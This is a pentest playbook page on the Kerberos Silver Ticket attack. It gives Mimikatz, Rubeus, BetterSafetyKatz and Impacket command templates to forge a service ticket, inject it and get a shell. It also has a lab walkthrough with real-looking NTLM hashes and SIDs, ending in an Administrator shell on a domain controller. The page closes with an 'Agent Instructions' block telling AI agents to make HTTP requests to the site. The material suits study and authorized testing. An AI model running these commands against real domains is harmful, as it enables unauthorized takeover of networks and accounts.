# Silver Ticket

<figure><img src="/files/fbFKtLQgDoRLRb7zlYQF" alt=""><figcaption></figcaption></figure>

## Silver Ticket

In Silver Ticket attack, we forge the TGS to gain access to a service, without needing to compromise a domain controller.

* We first compromise a service account by obtaining NTLM hash or Kerberos key.
* Forge the TGS using Mimikatz
* Use the forged TGS to authenticate to the specific service as the compromised account.
* Unlike Golden Ticket that uses TGT, Silver Ticket attacks do not require any interaction with DC, making it **stealthier**.
* Note: Golden ticket provides access to any service on any machine, where as Silver Ticket only provides access to particular service on a particular machine. Golden Ticket could last 6 months where as Silver expires in 30 days.&#x20;

### Windows:

{% code overflow="wrap" %}

```
# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd
```

{% endcode %}

### Linux:

{% code overflow="wrap" %}

```
python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 

python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass
```

{% endcode %}

### Attack in Practice:

When we have the DC/DA hash, we can create a Silver Ticket that provides access to a service of DC. Once the ticket is imported, we can get a shell as DC.

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"># ArgSplit for "silver"
# Use the NTLM or AES hash of dcorp-dc to forge and import ticket:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

# Similarly for WMI using BetterSafetyKatz.exe
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden
/User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-
719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local
/service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600
/renewmax:10080 /ptt" "exit"

# Similar command can be used for any other service on a machine. Which services? HOST, RPCSS, HTTP and many more

<strong># Since the ticket is imported, we can get a shell as DC and execute commands.
</strong>
C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC
</code></pre>

##


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/active-directory-pentest/persistence/silver-ticket.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.